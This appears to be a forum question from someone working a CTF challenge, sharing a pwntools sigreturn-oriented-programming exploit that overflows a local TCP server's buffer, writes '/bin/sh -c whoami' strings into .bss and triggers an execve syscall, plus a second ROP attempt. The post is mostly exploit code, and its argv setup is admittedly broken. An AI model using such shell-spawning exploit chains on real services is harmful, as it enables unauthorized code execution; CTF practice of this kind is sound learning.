i used sigreturn oriented programming to solve a ctf challenge. im’m not able to build the argv[] array rsi register for execve function.

Here is my python code for the exploit:

from pwn import *

program = context.binary = ELF('./TCPForkSocketServer_64Bit', checksec=False)
context.update(arch='amd64', os='linux')
libc = program.libc
libc.address = 0x00007ffff7d8b000

HOST = '127.0.0.1'
PORT = '10000'

#

bin_sh    = libc.address + 0x1d8678
system    = libc.address + 0x0000000000050d70

rax       = 0x00000000004012aa # pop rax ; ret
rdi       = 0x00000000004012b7 # pop rdi ; ret
xor       = 0x00000000004012de # xor rax, rax ; ret
syscall   = 0x00000000004012fc # syscall
ret       = 0x000000000040101a # ret
write     = 0x00000000004012ed # mov qword ptr [rdi], rax ; ret
where     = program.bss()

#

frame_1 = SigreturnFrame()
frame_1.rax = 0x3b
frame_1.rdi = where
frame_1.rsi = where+100
frame_1.rdx = 0x0
frame_1.rip = syscall

chain_1  = b''
chain_1 += b'x00'*136 # chain_1 += b'B'*6

chain_1 += p64(rax)
chain_1 += b'/bin/shx00'
chain_1 += p64(rdi)
chain_1 += p64(where+100)
chain_1 += p64(write)

chain_1 += p64(rax)
chain_1 += b'-cx00'
chain_1 += p64(rdi)
chain_1 += p64(where+108)
chain_1 += p64(write)

chain_1 += p64(rax)
chain_1 += b'whoamix00'
chain_1 += p64(rdi)
chain_1 += p64(where+110)
chain_1 += p64(write)

chain_1 += p64(rax)
chain_1 += p64(0xf)
chain_1 += p64(syscall)
chain_1 += bytes(frame_1)

#

p = remote(HOST, PORT)
p.recvuntil(b'Hello, client.', timeout=5)
p.send(chain_1)
p.interactive()

the following code i tryed too, it seems that the code spawns a shell but i want to call the command whomai, but the command does not get called.

rop = ROP(program, base=0x00007ffffffde000)
rop.call('execve', [bin_sh, [[b'/bin/sh'], [b'-c'], [b'whoami']], 0])
chain_1  = b''
chain_1 += b'x00'*136 # chain_1 += b'B'*6
chain_1 += rop.chain()
print(rop.dump())